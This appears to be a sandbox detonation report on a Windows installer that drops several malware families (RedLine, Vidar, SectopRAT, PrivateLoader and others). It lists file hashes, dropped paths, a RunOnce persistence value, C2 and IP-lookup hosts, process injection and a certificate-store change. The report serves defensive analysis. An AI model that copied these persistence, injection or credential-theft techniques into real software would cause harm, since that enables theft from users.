SHA512 6d23c8f73645bb2c6860dda462dafe443ab98b32e11be3ea808c92ec84fa706da36dc19c595145d76528ed314a4119caaa3e085438ec0ffe7a9cced4f8b36ddc

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\CrashpadMetrics-active.pma

MD5 9a31b075da019ddc9903f13f81390688
SHA1 d5ed5d518c8aad84762b03f240d90a2d5d9d99d3
SHA256 95cf4025babcd46069b425449c98ed15d97d364b2461417caa9aa0c13cb372e1
SHA512 a04726a429ae727d685f0836327c625d2f18d6327253216a9a31265a324b68b06bec4e7f1b744d261a0e67fa0a90c43719aeda9d2998f42525b0ff5640c7bf1e

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad\settings.dat

MD5 73d076263128b1602fe145cd548942d0
SHA1 69fe6ab6529c2d81d21f8c664da47c16c2e663ae
SHA256 f2dd7199b48e34d54ee1a221f654ad9c04d8b606c02bdbe77b33b82fb2df6b29
SHA512 e371083407ee6a1e3436a3d1ea4e6a84f211c6ad7c501f7a09916a9ada5b50a39dcb9e8be7a4dee664ea88ec33be8c6197c2f0ac2eabe3c0691bc9d0ed4e415d

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Local State

MD5 fdc7bea6a36bb1cb2854aabb274db951
SHA1 7dd44a949762b9fb990f798c2df8238d8cf75b21
SHA256 7d1ebfa1108c3826ab40627060d1b3f67a36aea8b1e10c590783822862f16e93
SHA512 2751e0010301b4a415af57319cce4ca28ff55ff96e5d95883829705b0a4b916a94570b938eb51c60623f70197c030e8c86d4b4cba3d3daafa38345895c8cfd47

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Variations

MD5 961e3604f228b0d10541ebf921500c86
SHA1 6e00570d9f78d9cfebe67d4da5efe546543949a7
SHA256 f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed
SHA512 535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\segmentation_platform\ukm_db

MD5 3979944f99b92e44fa4b7dbcb6ee91c2
SHA1 df2161c70a820fe43801320f1c25182f891261a4
SHA256 001d755b2b560945440023bf4ebfbda797cf5106419ac7dd270924b322f3ecf3
SHA512 358e6dee698a63c2490c2fb5206516766fd8ace8f3d523509c29ff76aa6a984cb6381468f15bb4b9c084d9a470298b4cc11b0970e671ce0316243069ac4c8590

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\ShaderCache\index

MD5 623219f1ab995d4382d51862e296993e
SHA1 ab714b5455c3a03280ede906b0341270e5e2b4c3
SHA256 e50e0bfc2a799dd9fe24d78ab3838d53b4369a435b883918876435c47acf9a78
SHA512 cf7ea8ed4c3584195803b511b9034695c7ee18d133ed63f51da5e407cc87a90905a2e6264116f67ddb4d0ccc2fff634521906eb04d46250930a6cc19929fd9aa

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Last Version

MD5 ef48733031b712ca7027624fff3ab208
SHA1 da4f3812e6afc4b90d2185f4709dfbb6b47714fa
SHA256 c9ce8dbbe51a4131073db3d6ceef1e11eaca6308ad88a86125f221102d2cee99
SHA512 ce3a5a429e3796977a8019f47806b8c0671b597ead642fcbfbe3144e2b8112d35a9f2250896b7f215d237d0d19c5966caf3fe674165a6d50e14cb2b88c892029

memory/1516-1380-0x0000000000B70000-0x0000000000C4D000-memory.dmp

memory/2968-1441-0x0000000001430000-0x000000000143E000-memory.dmp

memory/2968-1442-0x0000000001460000-0x0000000001472000-memory.dmp

memory/4464-1453-0x0000000009330000-0x00000000093BC000-memory.dmp

memory/4464-1454-0x0000000008220000-0x000000000823E000-memory.dmp

memory/1428-1455-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1828-1458-0x0000000004A40000-0x0000000004A76000-memory.dmp

memory/1828-1461-0x00000000050F0000-0x0000000005718000-memory.dmp

memory/1428-1462-0x00000000055E0000-0x0000000005BF8000-memory.dmp

memory/1428-1463-0x0000000005070000-0x0000000005082000-memory.dmp

memory/1428-1464-0x00000000050D0000-0x000000000510C000-memory.dmp

memory/1828-1465-0x0000000005870000-0x0000000005892000-memory.dmp

memory/1428-1466-0x0000000005110000-0x000000000515C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ttbjl2fr.sfy.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1828-1472-0x0000000005910000-0x0000000005976000-memory.dmp

memory/1828-1474-0x0000000005980000-0x00000000059E6000-memory.dmp

memory/1828-1480-0x0000000005B30000-0x0000000005E84000-memory.dmp

memory/1428-1481-0x0000000005380000-0x000000000548A000-memory.dmp

memory/1828-1482-0x0000000005FC0000-0x0000000005FDE000-memory.dmp

memory/1828-1484-0x0000000074CC0000-0x0000000074D0C000-memory.dmp

memory/1828-1483-0x0000000006590000-0x00000000065C2000-memory.dmp

memory/1828-1494-0x00000000065D0000-0x00000000065EE000-memory.dmp

memory/1828-1495-0x00000000071D0000-0x0000000007273000-memory.dmp

memory/1828-1497-0x0000000007930000-0x0000000007FAA000-memory.dmp

memory/1828-1498-0x00000000072E0000-0x00000000072FA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e443ee4336fcf13c698b8ab5f3c173d0
SHA1 9bf70b16f03820cbe3158e1f1396b07b8ac9d75a
SHA256 79e277da2074f9467e0518f0f26ca2ba74914bee82553f935a0ccf64a0119e8b
SHA512 cbf6f6aa0ea69b47f51592296da2b7be1180e7b483c61b4d17ba9ee1a2d3345cbe0987b96f4e25de1438b553db358f330aad8a26e8522601f055c3d5a8313cdd

memory/1828-1504-0x0000000007360000-0x000000000736A000-memory.dmp

memory/1828-1505-0x0000000007560000-0x00000000075F6000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 56a4f78e21616a6e19da57228569489b
SHA1 21bfabbfc294d5f2aa1da825c5590d760483bc76
SHA256 d036661e765ee8fd18978a2b5501e8df6b220e4bca531d9860407555294c96fb
SHA512 c2c3cd1152bb486028fe75ab3ce0d0bc9d64c4ca7eb8860ddd934b2f6e0140d2c913af4fa082b88e92a6a6d20fd483a1cb9813209f371a0f56374bc97d7f863b

memory/1828-1516-0x00000000074E0000-0x00000000074F1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 4df1f8c317d3d33cdc2dfebcbc885d1a
SHA1 abdfa86349ad80655137c78c7febf9d541921550
SHA256 c0f99364290d48d014583bce813ac08562a0e6bc76e3312ae0277ef9e7340cab
SHA512 d448c472372b1e639746d9d6ba23946001a7856b8e0ef1dc2a3f18321bad2d9d2e6a925736c76dd5c1eb77ce698631a900106360360bdf1a00dbf6fcd5264cd1

memory/1828-1522-0x0000000007510000-0x000000000751E000-memory.dmp

memory/1828-1523-0x0000000007520000-0x0000000007534000-memory.dmp

memory/1828-1524-0x0000000007620000-0x000000000763A000-memory.dmp

memory/1828-1525-0x0000000007600000-0x0000000007608000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 0e00900d659ac243044b597cd7c30c69
SHA1 b875c0ef5a85ec00b53c828b3116d81c70d6de6f
SHA256 c774e13a4f914b797aa80e5f0532035b869f256a4b25b5481a8fe6f236bd81cf
SHA512 400ec5693c17a7b11e74ff3baf6e1ed8ec95a6d7c1c4a673e0aa78ee958c6a205fdd549cf2eaf5aed808c46f3958156cf6fcdf9529026de882b50cea814c6822

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 0769ac90a2c4d32e1062e8b25fabffdd
SHA1 5197d5b2fd40340efb5f4ff4516d905b7348a7d6
SHA256 7bf1c7f661ce582ebe1c9668d3a22a47e5cee9e9c23415a70bac3206e9698614
SHA512 9fa54f33976e9b41ed4af119409269038ed04946260df1ea2d0d916b9d0c53912d94f627b377f13b2ba3372a5de756c87090c6bce3cb6488911f7ff0af25ca6a

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 be0b4b1c809dc419f44b990378cbae31
SHA1 5c40c342e0375d8ca7e4cc4e1b81b7ef20a22806
SHA256 530bd3b9ec17f111b0658fddeb4585cd6bf6edb1561bdebd1622527c36a63f53
SHA512 5ce316cfe5e25b0a54ceb157dee8f85e2c7825d91a0cd5fae0500b68b85dd265903582728d4259428d2e44b561423dac1499edcf0606ac0f78e8485ce3c0af24

memory/6020-1571-0x0000000000A90000-0x0000000000A96000-memory.dmp

memory/5188-1573-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5188-1576-0x00000000010E0000-0x0000000001100000-memory.dmp

memory/5188-1575-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5188-1578-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5188-1581-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5188-1579-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5188-1577-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5188-1580-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5188-1583-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5188-1584-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5188-1613-0x0000000140000000-0x0000000140786000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 4bc8a3540a546cfe044e0ed1a0a22a95
SHA1 5387f78f1816dee5393bfca1fffe49cede5f59c1
SHA256 f90fcadf34fbec9cabd9bcfdea0a63a1938aef5ea4c1f7b313e77f5d3f5bbdca
SHA512 e75437d833a3073132beed8280d30e4bb99b32e94d8671528aec53f39231c30476afb9067791e4eb9f1258611c167bfe98b09986d1877ca3ed96ea37b8bceecf

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-25 09:33

Reported

2024-11-25 09:36

Platform

win7-20241010-en

Max time kernel

59s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar

stealer vidar

Vidar family

vidar

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\08240101651be7e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\08240101651be7e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\f34b9ab9db6d16.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\f34b9ab9db6d16.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\453c5fa76a849.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\453c5fa76a849.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\08240101651be7e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\08240101651be7e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A

Reads user/profile data of web browsers

spyware stealer

Accesses 2FA software files, possible credential harvesting

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\08240101651be7e1.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.db-ip.com N/A N/A
N/A api.db-ip.com N/A N/A

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1392 set thread context of 2772 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\f34b9ab9db6d16.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\08240101651be7e010.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\453c5fa76a849.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7493EA61-AB10-11EF-8E0F-52DE62627832} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e6846